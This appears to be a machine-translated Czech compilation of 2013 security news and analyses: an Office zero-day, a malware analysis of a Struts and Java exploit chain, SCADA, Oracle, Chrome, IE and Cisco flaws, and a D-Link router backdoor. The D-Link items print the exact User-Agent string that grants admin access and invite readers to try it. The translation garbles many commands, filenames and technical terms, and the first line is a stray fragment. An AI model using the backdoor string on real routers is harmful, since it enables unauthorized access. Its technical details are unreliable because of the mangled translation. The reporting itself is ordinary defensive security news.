DOE řízení obdržel zprávu, z velké části souhlasí s jeho zjištěními, a zavázala k nápravě nedostatků zjištěných v něm.

Můžete si přečíst celou zprávu zde [PDF].


McAfee Labs Detekuje zero-day exploit cílení Microsoft Office
05.11.2013 Exploit | Zranitelnosti

Minulý čtvrtek ráno (31. října), naše Rozšířené Exploit Detection System (AED), které jsme zmínili v předchozí post , zjistil podezřelý vzorek cílení Microsoft Office. Po nějaké vyšetřování, jsme potvrdili to zero-day attack.
S ohledem na význam této události, jsme sdíleli naše zjištění okamžitě Microsoft Security Response Center a úzce s nimi v posledních pár dnech. Dnes, stejně jako Microsoft veřejně vydala informační zpravodaj zabezpečení se zmírňování a řešení, cítíme, že je čas podělit se některé detaily tohoto zero-day útoku.
Zde je doprava zachycena tímto útokem na plně aktualizovanou verzi sady Office 2007 se systémem Windows XP SP3.
traffic1
Jak můžeme vidět, po úspěšném vykořisťování exploit stáhne spustitelný soubor (uložen na C: \ Documents and Settings \ \ Local Settings <username> \ Temp \ winword.exe ) z kontrolovaného webového serveru .
Spustitelný soubor je vlastně RAR SFX obsahující další spustitelný soubor a falešný dokument aplikace Word. Jiný spustitelný soubor (klesl na C: \ Documents and Settings \ \ <username> Updates.exe ) je backdoor umožňuje útočníkovi převzít kontrolu nad počítačem oběti. Falešný dokument (klesl na C: \ Documents and Settings \ \ <username> Shanti.doc ) se odebere oběti hned po úspěchu vykořisťování, je to společný post-těžba trik, který se snaží zabránit obětem z vědoma tohoto útoku.
Zero-day exploit vzorek je organizována jako OpenXML formátu Word (. Docx). Pozorovali jsme mnoho objektů ActiveX obsažených v "ActiveX" adresáři po rozbalení. Souboru DOCX. To naznačuje, že exploit používá ovládací prvek ActiveX sprej haldy paměti.
activex_spray1
Je třeba poznamenat, že tato haldy postřik Office přes objekty ActiveX je nová těžba trik, který jsme neviděli předtím, dříve útočníci obvykle vybral Flash Player sprej paměti v sadě Office. Jsme přesvědčeni, že by se nový trik byl vyvinut pod pozadí, které Adobe představila click-to-play funkce v aplikaci Flash Player měsíci, který v podstatě zabil tu starou. To je další důkaz toho, že útočí na techniku ​​se vždy snaží vyvíjet, když ty staré už nefungují.
Jak se ukazuje, byly meta data ze souborů nastaven na 17 říjnu 2013, který může navrhnout čas vytvoření tohoto exploitu (i když může být falešný meta čas).
A to je místo, které EIP je řízen na stříkaného paměti 0 × 08080808.
eip_control_windbg_hidden21
Když už mluvíme o zranitelnosti prosazeny tímto útokem, když jsme spatřili útok provádí pomocí Office 2007 v systému Windows XP, je to vlastně chyba existuje ve TIFF zpracování komponenty dodávané se sadou Microsoft Office. Proto jsou nejen Office 2007 v systému Windows XP zranitelné vůči tomuto útoku, ale i další prostředí jsou touto chybou zabezpečení ohroženy. Navíc, naše pozdější výzkum ukázal tento exploit funguje i na Office 2007 provoz na Windows 7. Rádi bychom naznačují, že čtenáři se podívat na místo SRD blog , kde se podělili o přesné ovlivněným prostředím a výhled z pohledu dodavatele. Labs aktivně pracuje na získání každý kus podrobnosti o této zneužití, můžeme sdílet naše další zjištění v blízké budoucnosti.
Naše AED nadále sleduje pokročilých hrozeb, jako zero-day exploity a apts po celém světě, v rámci našich závazků k ochraně našich zákazníků z dnešních rychle se rozvíjejících útoků.
Pro zákazníky společnosti McAfee, jsme vydali NIP podpis " UDS-ShantiMalwareDetected "minulý pátek dodat ochranu v předstihu, náš HIPS produkt je schopen detekovat tento útok bez jakékoli aktualizace.
Díky Bing Sun, Chong Xu, Xiaoning Li (Intel Labs) a Lijun Cheng za jejich tvrdou práci na exploitu analýzy, stejně jako IPS detekcí. Guilherme Venere a Abhishek Karnik také přispěl z anti-virus straně.


Exploit koktejl (Struts, Java, Windows) jít po 3-měsíc staré zranitelnosti
5.11.2013 Exploit | Zranitelnosti

Když ISC čtenář Yin hlášeny dneska, že jeden z jejich servery byly hacknutý přes Apache Struts provádění příkazů dálkového zranitelnosti (CVE-2013-2251), zpočátku to bylo označeno jako "business as usual". Řekl zranitelnost, po tom všem, je znám od července, a my jsme byli svědky pokusů Exploit od začátku srpna (deník zde ). Tak to bylo docela překvapení vidět unpatched internet exponované serveru podkopána. Vzhledem k tomu, nekontrolovatelný skenování, bylo to víc překvapující, že to přežil bez úhony až do současnosti.

V důsledku úspěšného útoku, zločinci změnit základní index.jsp na ohrožený server, který zahrnuje fragment, jako je následující:

Související stránky jsou stále ještě žijí, což je důvod, proč je výše uvedený obraz a není klikací URL. Pokud stále trvají na tom, jít hledat, buďte opatrní a neobviňujte nás! Opuštění webový server a Struts zranitelnosti aspekt věci, pojďme se nyní podívat na to, co číhá na tom Namu-v místě:

Jo, je tu APPLET tag. Zneužití Java opět, zdá se. Oracle Java je skutečný dar, který udržuje na to, aby ...!

daniel @ foo3: ~ / malware $ ls-al Init.jar
-rw-r - r - 1 daniel uživatelů 49019 24.října 16:04 Init.jar
daniel @ foo3: ~ / malware $ md5sum Init.jar
714ef7f35f2bac61c4bace8706f88b98 Init. skřípat

daniel @ foo3: ~ / malware $ unzip Init.jar
Archiv: Init.jar
nafukování: META-INF/MANIFEST.MF
nafukování: Print.class
nafukování: Init $ MyColorModel.class
nafukování: Init $ MyColorSpace.class
nafukování: Init.class

Přítomnost "MyColorModel" a "MyColorSpace" souborů v archivu JAR naznačuje, že by to mohlo být exploit pro CVE-2013-2465, 2D/AWT chyba, která ovlivňuje všechny Javy až 1.7_21. Při bližším zkoumání, je to potvrzeno, Init.class skutečně využívá CVE-2013-2465 a pak zavolá Print.class, což se zdá, vytvořte soubor s názvem "mspaints.exe":

Obsah souboru je čerpána z proměnné "data" nebo "data1", v závislosti na verzi operačního systému setkal. Obě tyto proměnné jsou definovány v "Print.class":

Sekvence 7777 ... jsou docela vzácné, v reálném světě EXE. Příslušné série nul (00), by bylo mnohem běžnější. A podívejte se, jak se soubor začíná "3A2D" .. pokud je to opravdu EXE, pak tyto první dva bajty by musel být "MZ" (5A4D). Takže .. tato "data" Pole je asi jen XORed s 0x77? Zkusme:

daniel @ foo3: ~ / malware $ echo "3A2D" | perl-pe 's / (..) / chr (hex ($ 1) ^ 0x77) / ge "
MZ

Busted! :)

Krmení celé dva "data" pole pomocí stejné operace Perl změní hexadecimální sadu do binárních souborů, to vše při XOR-ing každý byte s 0x77: daniel @ foo3: ~ / malware $ cat data.hex | perl-pe 's / (..) / chr (hex ($ 1) ^ 0x77) / ge "> data.exe daniel @ foo3: ~ / malware $ file data.exe data.exe: PE32 executable pro MS Windows (GUI) Intel 80386 32-bit daniel @ foo3: ~ / malware $ md5sum data.exe cd2dd181257375c840f13988c8c7b6d5 data.exe

Hledání této MD5 hashi na VirusTotal https://www.virustotal.com/ # hledání nám dává výsledek s poněkud ponuré 3/47 objasněnosti. Ale aspoň někdo už nahrál dřív.

V další fázi analýzy je nyní na dva EXE soubory, data.exe a data1.exe. Tento úkol je - obecně - o dost složitější než jen reverzní inženýrství JavaScript nebo Java, protože statická analýza (jako my na applet), může být docela spolehlivě zmařeny na EXE a dynamické analýzy (= skutečně spuštěním souboru) může být plný překvapení "." Názorný příklad:

daniel @ foo3: ~ / malware $ strings data.exe | grep-i ladění
OutputDebugStringA
IsDebuggerPresent

Vypadá to, že náš EXE vyvolá Windows API metoda "IsDebuggerPresent" ověřit, zda debugger je právě spuštěn. Je pravděpodobné, že bude EXE chovat jinak, pokud je podezření, že někdo (jako malware analytik :) sleduje každý jeho pohyb. V tomto případě zde je nicméně docela snadno možné zjistit, co tyto dva EXE dělají: Jsou, jak to tak bývá, jednoduše "stahují", které načíst další fáze útoku kódu. K dispozici jsou čtyři stažené soubory a všechny pocházejí z www-sandulsori-CO-KR.

daniel @ foo3: ~ / malware $ ls-al *
-rw-r - r - 1 daniel uživatelů 55296 24.října 12:21 common.gif
-rw-r - r - 1 daniel uživatelů 71680 24 říjen 12: 21 common.png
-rw-r - r - 1 daniel uživatelé 21.října 7680 08:08 favicon1.ico
-rw-r - r - 1 daniel uživatelů 79872 17.října 09:44 favicon.ico
daniel @ foo3: ~ / malware $ md5sum *
e2004ec5fef378b2e41f6eef6931650b common.gif
3fed1004befb9834b699a88ccdce757e common.png
c85f70642ad402077c6447dc6ad6f7bb favicon1.ico
93a2dc2dcdb4bb17ae168cb60cff2e9b favicon.ico
daniel @ foo3: ~ / malware $ file *
common.gif: PE32 executable pro MS Windows (konzole) Intel 80386 32-bit
společné . png: PE32 + spustitelný soubor pro MS Windows (konzole) Mono / NET assembly
favicon1.ico: PE32 executable pro MS Windows (GUI) Intel 80386 32-bit
favicon.ico: PE32 executable pro MS Windows (DLL) (GUI) Intel 80386 32-bit

Všimněte si, jak všechny čtyři soubory tvrdí, že obraz, i když jsou EXE. Dva soubory s názvem "obyčejný" obsahovat EPathObj Windows exploit (CVE-2013-3660), což má za následek oprávněními SYSTÉMU ve verzích systému Windows, které nemají opravu MS13-053 (červenec 2013). Analýza dvou favicon soubory stále probíhá. Zúčastněné domény (celkově) jsou: www-Namu-in-com, v současné době 110.45.165.42 pro etapu # 1 www-sandulsori-ko-kr, v současné době 111.92.188.21 pro etapu č. 2, a www-staticscount-com , v současné době 74.82.173.187 pro Command & Ccontrol (C & C). Tyto stránky a IP bloky nejsou nutně nepřátelské samo o sobě, mohou být také oběťmi dřívější hack / převzetí.

Ponaučení z příběhu je, že všechny výše uvedené je založena na využije zranitelnosti, které záplaty jsou k dispozici od roku asi tři měsíce. Pokud váš záplatování operačního systému a aplikace zaostává v této míře z důvodu nedostatku finančních prostředků nebo prioritní, budete muset dohnat co nejdříve. Jak je uvedeno výše, protivníci přinášejí využít koktejly, které poskytují oprávnění na úrovni systému na počítačích s Windows, které nemají potřebné záplaty a aktuální antivirové vzory nabízejí malou ochrany proti ní.


Bug Lovci najít 25 ICS, SCADA zranitelnosti
16.10.2013 Zranitelnosti | Bezpečnost

Trojice vědců odhalila 25 bezpečnostních zranitelností v různých dispečerské řízení a sběr dat (SCADA) a průmyslové řídicí systém (ICS) protokoly.

Výzkumníci, Adam Crain, Chris Sistrunk a Adam Todorski i když Todorski dosud nebyla připsána zjištění některého z popsaných chyb, se provádí tento výzkum se sponzorstvím od Automatak, firma - začal Crain -, který poskytuje podporu zabezpečení tvůrci a údržbáři těchto druhů ICS a SCADA zařízení, které ovládají většinu světového kritické infrastruktury a průmyslových strojů.

Dosud vědci zveřejnili podrobnosti o pouhých devět zranitelností, z nichž každá je vzdáleně zneužít, když tvrdí, že objevili dalších 16 chyb, ale podrobnosti těchto chyb jsou projednávány jak komunikovat s postiženými dodavatelů. Každý zveřejněny chyba se zdá, že byla potvrzena a stanoví prodejce, i když to neznamená, že správci na zranitelné systémy jsou nainstalovány záplaty.

Všechny jejich výzkum je součástí projektu ROBUS. Odvození jeho jméno z latinského podstatného jména za zdroj síly, projekt probíhá hledání Zero Day zranitelnosti v softwaru SCADA a ICS. Je i přes své odpovědnosti za kontrolu hodně z největších světových kritické infrastruktury a průmyslových procesů, SCADA a ICS protokoly jsou notoricky náchylné k využití, zejména pokud jde o realitu danou human spoléhání se na vodě a elektráren.

Konkrétně Crain a Sistrunk odhalil dvě chyby v IOServer. Nesprávné zabezpečení ověření vstupu v DNP3 software ovladače a další ve stejném kusu hlavního nádraží softwaru. Každá chyba by mohla způsobit nekonečnou smyčku, pokud by útočník měl odeslat speciálně vytvořený paket TCP. Jediná cesta ven ze smyčky by bylo provést ruční restart.

Pár také našel DNP3 ověřování vstupu v reálném čase Schweitzer Engineering Laboratories automatizačních řídicích využitelných za obdobných podmínek. Útočník by mohl poslat do zařízení do nekonečné smyčky, a, v závislosti na nastavení zařízení, mohou být její regulátory znovu načíst nastavení konfigurace po restartu.

Crain a Sistrunk také stanoveno, že by odeslat speciálně vytvořený paket TCP do Kepware Technologies DNP ovladač master pro KEPServerEX komunikační platformu tím, že využívá ještě další ověření vstupu zranitelnost. Výsledkem opět bude nekonečná smyčka, ale také odmítnutí služby stavu. Tento systém by vyžadovat restartování počítače za účelem navrácení. V podstatě stejná chyba zabezpečení v ovladači hlavní DNP pro TOP OPC serveru serveru, roztroušená Triangle MicroWorks "výrobky, některé součásti třetích stran a MatrikonOPC SCADA DNP3 OPC serveru.

Poslední dvě chyby v softwaru, existují podsíti Solutions rozvodny Server a Alstom e-terracontrol software. Každé chybě zabezpečení by mohl útočník schopnost ovlivnit dostupnost příslušných výrobků.

Potenciální dopad všech těchto chyb samozřejmě závisí na konfiguraci nastavení zařízení.

Vědci objevili tyto nedostatky pomocí vlastní čipové fuzzer, že vám dá přístup veřejnosti k jako open source nástroj v březnu.

Automatak tvrdí, že odhaluje zranitelnost vůči prodávajícím a ICS-CERT, práce s postiženými prodejců ověřit opravy a zlepšení testování.


Oracle Čtvrtletní aktualizace obsahuje opravy pro 50 dálku spustitelné chyby Java
16.10.2013 Zranitelnosti | Update

V úterý se poprvé byly Java aktualizace zabezpečení součástí čtvrtletního Oracle Critical Patch Aktualizace - a stejně rychle, Java neztrácel čas zvedat se jako nejlepší starost o Oracle adminy a odborníků v oblasti bezpečnosti.

Z 51 záplat Java uvolněných, 50 umožnit vzdálené spuštění kódu a 20 dostali nejvyšší hodnocení kritičnosti Oracle.

"Většina chyb se soustředí na straně klienta v jazyce Java, tedy ve stolních / notebook nasazení, s nejčastější způsob útoku je prohlížení internetu a škodlivé webové stránky, ale tam jsou dvě vysoce kritické chyby, které se rovněž vztahují na serverové nasazení," řekl Qualys CTO Wolfgang Kandek.

Uživatelé jsou vyzýváni, aby okamžitě upgradovat na verzi Java 7 Update 45; Java 6 instalace jsou také citlivé na téměř tucet kritických chyb, odborníci a dodal, že uživatelé by se měli vyhnout umožňuje plug-in zcela nebo izolovat Java 6 strojů.

"V ideálním případě budou uživatelé vypnout Java plugin, pokud to není výslovně nutné a spusťte jej pouze v prohlížeči, který můžete použít pouze pro ty, jednu nebo dvě stránky, které vyžadují plugin," řekl Ross Barrett, vedoucí bezpečnostní inženýr Rapid7. "Jinak, spouštět aplikace Java v nejvíce omezeném režimu a umožňují pouze podepsané applety z bílé památek zapsaných ke spuštění."

Java 6, je však již nejsou podporovány společností Oracle a bezpečnostních záplat nejsou vyvíjeny.

"Doporučené akce pro Java 6 zde je upgrade na Java 7, pokud je to možné," řekl Kandek. "Pokud nelze upgradovat, bych doporučil izolovat stroj, který potřebuje Java 6 běží a nepoužívejte jej k jiným činnostem, které se připojují do Internetu, jako je například e-mail a prohlížení."

Odborníci připomínají, že uživatelé i nejnovější Java aktualizace také zahrnuje podepsání kódu omezení a pop-upy varování uživatelů, které nepodepsané aplety Java představovat bezpečnostní riziko, a že nebudou provádět automaticky ve výchozím nastavení.

Známý Java chyba lovec Adam Gowdiak řekl Threatpost, že opravy i ztvrdlé interakce LiveConnet kódu, prohlížeč, funkce, která umožňuje applety komunikovat s motorem javascript v prohlížeči a Java Rich Internet Applications.

"Díky této souvislosti jsou některé další varovné dialogy se uživateli zobrazí před umožňující volání z JavaScriptu Java," Gowdiak a dodal, že Oracle také oprava a reflexní API zranitelnost podal na společnost.

Na straně serveru byly záplatované CVE-2013-5782 a CVE-2013-5830. Chyby byly nalezeny v Oracle JRockit, Java Virtual Machine postaven do jejího Oracle Fusion Middleware.

"Kromě oprav Java, nic jiného, ​​vyskočí za mimořádně zajímavé," řekl Barrett Rapid7 je.

Celkově lze říci, že jsou 127 skvrny na CPU Oracle, které se dotýkají většina z produktové řady Oracle. Kromě zranitelností Java, jen jiná chyba blíží stejnou úroveň kritičnosti je MySQL Enterprise Monitor, ale to není vzdálené spuštění chyba. MySQL Enterprise Monitor je real-time management rozhraní, které bdí nad databází MySQL pro výkon, dostupnost a bezpečnost.

Databáze manažeři by měli být informováni o čtyři záplaty pro RDBMS Oracle, z nichž všechny jsou vzdáleně zneužít, když poukazuje na to, že Kandek Oracle databáze nejsou vystaveny na internetu.

K dispozici je 17 záplaty pro Oracle Fusion Middleware, tucet z nich jsou vzdáleně zneužít. Zvenčí v dokumentu komponentní Fusion používá také v Microsoft Exchange instalace je také oprava v této aktualizaci. Funkce získal nějakou pozornost s aktualizací Microsoft srpna Patch Tuesday . Útočník by mohl získat vzdálený přístup nalákat uživatele k otevření nebezpečného souboru s aplikací Outlook Web Access.

Oracle také vydal tucet záplaty pro své řady Sun produktu, včetně chyby v modulu Sun SPARC správu serveru, které by mohly poskytnout útočníkovi přístup k řadě důležitých funkcí pro správu.

Zbývající opravy chyby řeší bezpečnost v produktu Oracle Enterprise Manager Grid Control, řada podnikových aplikací Oracle, včetně dodavatelského řetězce, PeopleSoft, Siebel a iLearning, průmysl, finanční a Primavera Apps.


Google opravuje tři vysoce rizikových chyby v Chrome
15.10.2013 Zranitelnosti

K dispozici je trojice s vysokým rizikem chyb zabezpečení v prohlížeči Google Chrome, které byly záplatované v nové verze prohlížeče propuštěn na úterý.

Chyby jsou všechny use-after-bez chyby, a Google zaplatil celkem 5.000 dolarů odměny pro výzkumné pracovníky, kteří objevili a nahlásili. Google také řekl, že tam bylo několik bezpečnostních problémů nalezené interní firemní bezpečnostní tým, který není obvykle vypuknout na jednotlivé nedostatky.

Nová verze Chrome je trochu atypické propuštění Google. Společnost aktualizuje prohlížeč poměrně často, ale mnoho z vydání zahrnují větší počet bezpečnostních chyb než verze 30.0.1599.101 která byla dnes zveřejněna. Úplný seznam chyb opravených v této verzi jsou:

[$ 1000] [ 292422 ] High CVE-2013-2925: Použijte po zpětném zdarma v XHR. Úvěry atte Kettunen z OUSPG .

[$ 2000] [ 294456 ] High CVE-2013 až 2926: Použijte po zpětném zdarma v editaci. Úvěr cloudfuzzer .
[$ 2000] [ 297478 ] High CVE-2013-2927: Využití po volném formulářů. Úvěr cloudfuzzer .
Uživatelé by měli aktualizovat své prohlížečů co nejdříve, aby se zabránilo útokům proti těmto chybám zabezpečení.


Staré firmy D-Link routery s kódovaným backdoor

14.10.2013 Zranitelnosti

Chyba se objevila ve staré D-Link routerů, která umožňuje útočníkovi získat oprávnění správce ve směrovači. Následující modely jsou ovlivněny:

DIR-100
DI-524
DI-524UP
DI-604S
DI-604UP
DI-604 +
TM-G5240
DIR-615
Pokud váš uživatelský agent je nastaven na xmlset_roodkcableoj28840ybtide , budete moci prohlížet a měnit nastavení zařízení. K dnešnímu dni D-Link není zaslali řešení. Máte-li jakékoli bezdrátový směrovač odpovídající zranitelné modely, musíte:

Zabraňte neoprávněnému přístupu k bezdrátové síti: Použít WPA2 s klíčem delší než 10 bajtů a náhodné. To sníží šance na hrubou silou k routeru.
Ujistěte se, že umožnění přístupu k bezdrátové síti s někým, komu důvěřujete, zatímco DLINK zveřejní opravu, protože nelze určit jednu IP adresu pro účely admin ;)
Když DLINK psát řešení, možná budete chtít, aby zajistily, že nepoužíváte žádné výchozí heslo správce. Podívejte se zde na výchozí bezdrátového směrovače hesel a podívejte se na reference DLink. Máte-li výchozí heslo, zaškrtněte tuto stránku hledat informace o tom, jak přistupovat k admin nástroj pro změnu hesla.


Některé staré routery od D-Linku lze velmi snadno prolomit

14.10.2013 Zranitelnosti
Některé starší routerty od D-Linku lze velmi snadno prolomit. Útočník se může do jejich administrace dostat i bez znalosti hesla. Přesvědčil se o tom jeden z autorů blogu Devttys0.com, který analyzoval firmware verze 1.13 pro router DIR-100 revA.

V kódu systému objevil zvláštní textový řetězec „xmlset_roodkcableoj28840ybtide“ a podmínku, která vpustila každého návštěvníka do webové administrace routeru i bez hesla, pakliže měl tuto hodnotu klient nastavenou v hlavičce User-agent.
Do webové administrace vybraných routerů od D-Linku se dostane každý člen sítě i bez znalosti hesla správce
Nejedná se o žádná zadní a třeba i servisní vrátka autorů firmwaru, ale o zadní vrátka některých autonomních služeb routeru, které se pomocí této HTTP hlavičky mohou dostat přímo ke konfiguraci, aniž by znaly login a heslo správce routeru.

Tato zadní vrátka se týkají několika dalších starších modelů od D-Linku a seznam na blogu jistě stále není kompletní. Pokud tedy doma máte také router od D-Linku a zvládnete změnit podpis svého prohlížeče, tento hack si můžete vyzkoušet a ověřit v praxi, jestli se náhodou netýká i vás.

Nezbývá než doufat, že se výrobce poučil a stejně tak ostatní dnes nic podobného nepoužívají, na světě je totiž poměrně hodně crackerů, kteří se po večerech baví reverzní analýzou kódu prakticky jakékoliv aplikace. Je s podivem, že s tím D-Link očividně vůbec nepočítal.


Ze 100 000 dolarů uvidí nálezce chyby minimum

13.10.2013 Zranitelnosti
Velká část odměny, kterou bezpečnostní výzkumník dostal od Microsoftu za upozornění na vážnou zranitelnost Windows 8.1, připadne jeho zaměstnavateli a daňovému úřadu.

Zůstatek na bankovním účtu Jamese Forshawa v tomto týdnu narostl o závratných 100 tisíc dolarů. Microsoft jej takto odměnil za upozornění na vážnou zranitelnost v operačním systému Windows 8.1.

Jde zcela jistě o jednu z největších odměn, která kdy byla nálezci nějaké chyby vyplacena. Bohužel pro Forshawa se o většinu získaných peněz bude muset podělit s dalšími subjekty.

Jak vysvětluje sám „šťastný“ nálezce, v tomto případě půjde velká část získané odměny na konto jeho zaměstnavatele, kterým je společnost Context. „I kdyby tomu tak nebylo, po zásahu berního úředníka by se částka stejně výrazně zmenšila. Rentiérem se tedy rozhodně nestanu,“ říká s nadhledem Forshaw.

Forshaw přišel ve Windows 8.1 na bezpečnostní chybu, kterou rozhodně nelze označit za běžnou zranitelnost. Případným útočníkům by umožnila zcela obejít bezpečnostní mechanismy operačního systému a získat volný přístup k uživatelským datům.

Vyplácení odměn za nalezení bezpečnostních zranitelností se stalo již běžnou praxí. Kromě Microsoftu výzkumníky odměňují například také v Googlu. Důvod je jednoduchý. Programy obou firem jsou natolik rozsáhlé, že není v jejich silách vše ohlídat. Člověk „zvenčí“ navíc může do dané problematiky vnést úplně nový pohled.

„Microsoft i Google mají poměrně velkou bezpečnostní sekci, která aktivně vyhledává softwarové chyby v produktech a okamžitě je opravuje. Nicméně někdy mají k danému produktu prostě příliš blízko – pro les nevidí stromy,“ říká Forshaw. Bez patřičného odstupu to zkrátka někdy nejde.

Firmám se využívání externích výzkumníků vyplatí i finančně. „Jednoduše nemůžete vyhradit dostatečné množství prostředků na odhalení všech chyb. Externí výzkumníci vyjdou levněji než tým bezpečnostních expertů, který by musel pokrýt všechny úhly,“ vysvětluje Forshaw.

Některé externí badatele oslovují firmy cíleně. To byl právě i tento případ. „S lidmi z Microsoftu mám dobré vztahy. V minulosti jsem je upozornil již na řadu chyb. Proto se nyní na mě i na pár dalších výzkumníků sami obrátili,“ řekl Forshaw.


Nový Internet Explorer Zero-day útoky proti Cílená v Koreji a Japonsku
12.10.2013 Zranitelnosti | Hacking

V Microsoft Patch Tuesday pro říjen 2013 společnost vydala MS13-080 řešit dvě zásadní chyby, které byly aktivně využívány v omezených cílených útoků. První kritická chyba v aplikaci Internet Explorer, Microsoft Internet Explorer chyby zabezpečení poškození paměti (CVE-2013-3893), byla projednána v dřívější blogu společnosti Symantec .

Druhým zásadním chyba v aplikaci Internet Explorer je prohlížeč Microsoft Internet Explorer Chyba zabezpečení poškození paměti (CVE-2013-3897). V blogu od Microsoftu , společnost popisuje, jak tento problém je use-after-bez zranitelnost CDisplayPointer spustil s onpropertychange obslužnou rutinu události. Blog pokračuje vysvětlením, jak exploit využívá JavaScript, haldy sprej přidělit malé ROP řetěz kolem adresu 0x14141414. Když nalezený v divočině, byl navržen tak, aby exploit zaměřují pouze na Internet Explorer 8 v systému Windows XP pro korejské a japonské jazykové bázi uživatele. Pro zákazníky společnosti Symantec, následující je ochrana již u tohoto útoku:

Antivirus:
Trojan.Maljava
Trojan.Malscript
Backdoor.Trojan
Downloader.Tandfuy

Intrusion Prevention System:
Web útok: Škodlivý JavaScript Heap Spray Generic

Symantec telemetrie ukazuje, že útok využívají CVE-2013-3897 začalo kolem 11.9.2013 a že ovlivněn především jihokorejské uživatelům, kvůli tomu, jak se webové stránky na populární korejské blogů stránky slouží k přesměrování uživatele na místě konání využít.

Symantec nadále vyšetřuje tento útok s cílem zajistit, že nejlepší možná ochrana je k dispozici. Jako vždy doporučujeme, aby uživatelé zachovat jejich systémy up-to-data s nejnovějšími oprav softwaru. Rovněž doporučujeme zákazníkům využívat nejnovější technologie Symantec a začlenit nejnovější Norton spotřebitele a Symantec Enterprise řešení , aby co nejlépe chránit před útoky tohoto druhu.

Aktualizace - 09.10.2013:
Společnost Symantec vydala další IPS podpis k ochraně proti CVE-2013-3897:
Web útok: Internet Explorer poškození paměti CVE 2013-3897

Update - 11.10.2013:
Společnost Symantec vydala další AV detekce pro ochranu proti CVE-2013-3897:
Bloodhound.Exploit.518


Záplatovaný IE zero-day a starší vada využívány v rámci probíhajících cílených útoků
11.10.2013 Zranitelnosti

Díky tento měsíc Patch Tuesday, Microsoft vydal patch pro neslavný Internet Explorer zero-day (CVE-2013-3893), která byla spatřena používaného při útocích, které je datum zpět, třemi nebo čtyřmi měsíci a byly vázány na . Čínská hacking skupina, která zasáhla Bit9 letos co získal trochu méně pozornosti je, že patch pro další IE zero-day aktivně využívány ve volné přírodě byl propuštěn současně: CVE-2013-3897. "chyba zabezpečení je způsobena tím, "use-after-zdarma" chyba při zpracování '' CDisplayPointer objekty v Mshtml.dll a obecně vyvolána "onpropertychange" obslužné rutiny události, chybu zabezpečení lze zneužít vzdáleně útočníkům napadnout počítač přes nebezpečné webové stránky, "Elad Sharf , Senior Security výzkumný pracovník společnosti Websense, vysvětlil v blogu. chyba je využívána v řadě vysoce cílené, malosériových útoky v Jižní Koreji, Hongkongu a USA, jejímž cílem společnosti v oblasti financí, strojírenství a stavebnictví, výrobní a vládní sektor. Stránky útok návnada se nacházejí v síťovém rozsahu přiřazeného Korejské republiky, a předložit konzistentní struktury adres URL ( xxxx/mii/guy2.html ). Je také zajímavé si uvědomit, že existují i jiné stránky - se stejnou strukturou -. Které slouží exploit pro starší chyby IE (CVE-2012-4792), který byl opravovaný chvíli zpět A zatímco exploit pro CVE-2013- 3897 chyba je vyvolána pouze návštěvníky se systémem Windows XP 32-bit s jazykem nastaveným na japonské nebo korejské a vlastníků IE 8, CVE-2012 až 4792 zneužít nečiní žádné rozdíly a cíle všech návštěvníků. "Počítačoví zločinci pokračovat v inovacích , zjistí, zero-day zranitelnost a využívat je při nízké hlasitosti cílených útoků a současně s nimi i zaměstnávání starších známé exploity, "říká Sharf." To svědčí z nich, který provedl důkladný průzkum s cílem poskytovat užitečné zatížení, které se domnívají, že je pravděpodobné, že k úspěchu. "


Google nabízí odměny pro vylepšení kódu open source programů
11.10.2013 Zranitelnosti

Google oznámil, že mají v plánu odměnit výzkumné pracovníky, kteří mají za cíl "zlepšit bezpečnost klíčový software třetích stran má zásadní význam pro zdraví celého Internetu" s "down-na-zemi, proaktivní vylepšení, které jdou nad rámec pouhé stanovení známou bezpečnostní chybu . "
V open source projekty, v jejichž záplaty mohou vědci odměněn v současné době základní služby infrastruktury sítě, jako je OpenSSH, BIND, ISC DHCP, image analyzátory jako libjpeg libjpeg-turbo, libpng, giflib, open-source základy Google Chrome (chromu, Blink );. velkým dopadem knihovny jako OpenSSL a zlib a zabezpečení kritických komponent linuxového jádra (včetně Kernel-based Virtual Machine) v nadcházejících týdnech a měsících, bude program zahrnovat populární webové servery, SMTP služeb, OpenVPN, GCC, binutils, LLVM, a další. "Přemýšleli jsme, prostě Odstartoval OSS bug-lovecký program, ale tento přístup může vymstít," vysvětlil Google bezpečnost členů týmu Michal Zalewski. "Kromě platných zpráv o chybách prémií pozvat značné množství rušivého provozu. -. Dost zcela přemoci malou komunitu dobrovolníků Na vrcholu tohoto, kterým se problém často vyžaduje více úsilí, než najít to" Společnost vysvětlila, že tentokrát tam bude žádné odměny pro stanovení individuálních chyb, protože "poměrně málo chyby vystopovat předejít kódování chyb, nebo jsou snáze využívat kvůli absenci jednoduchých technik snižování," a doufají, že ke zvýšení bezpečnosti zdola nahoru . Všichni ve všech, v tomto konkrétním programu, bude Google mají jen málo společného se skutečnými podání, neboť výzkumníci jsou vyzváni k předložení patche přímo správci každého z těchto projektů. Jakmile podání je přijata a jsou zahrnuty v Výsledný kód k softwaru, mohou vědci odeslat záznam do Google, a odměnou panel se rozhodnout, jak velkou odměnu zaslouží - obvykle od $ 500 až $ 3,133.7, ale občas dokonce vyšší to podání je "neobvykle chytrý nebo složité." Příklady způsobilých podání patří zlepšování upřednostňovat oddělení, přidělování paměti kalení, Sanace celočíselné aritmetice, systematické stanoví pro různé typy závodních podmínek a odstranění náchylných k chybám návrhových vzorů nebo knihovny volání.


Cisco opravy 11 zranitelných míst v FWSM, ASA produkty
11.10.2013 Zranitelnosti

Cisco vytlačila oprav u dvou produktů, tento týden, řešit hrst chyb v jeho Firewall Services Module (FWSM) software a Adaptive Security Appliance (ASA) software.

Podle aktualizací zabezpečení přidaných společnosti poradního stránce včera nejméně devět samostatných chyby zabezpečení v ASA:

IPsec VPN Vyrobeno ICMP paketů odmítnutí zabezpečení služby
SQL * Net Kontrola motoru Denial of Service zabezpečení
Digitální certifikát Ověření Bypass zabezpečení
Remote Access VPN autentizace Bypass zabezpečení
Digitální certifikát HTTP Authentication Bypass zabezpečení
HTTP Hloubková inspekce paketů Denial of Service zabezpečení
DNS Kontrola Denial of Service zabezpečení
AnyConnect SSL VPN Paměť Vyčerpání Denial of Service zabezpečení
Clientless SSL VPN Denial of Service zabezpečení
Pět z devíti může být buď znovu ohrožený zařízení nebo vést k odmítnutí služby (DoS) stavu.

Tři z devíti může vést k ověřování obejít a dát útočníkovi přístup k síti prostřednictvím vzdáleného přístupu VPN a přístup ke správě pomocí adaptivní řízení Cisco Security Device (ASDM) nástroje.

Poslední ASA zranitelnost zabývá AnyConnect Cisco SSL VPN a může také vést k odmítnutí služby. Pokud se provádí, by útočník mohl vyčerpat paměť, což celý systém nestabilní, přestane reagovat a nakonec zastavit přesměrování provozu.

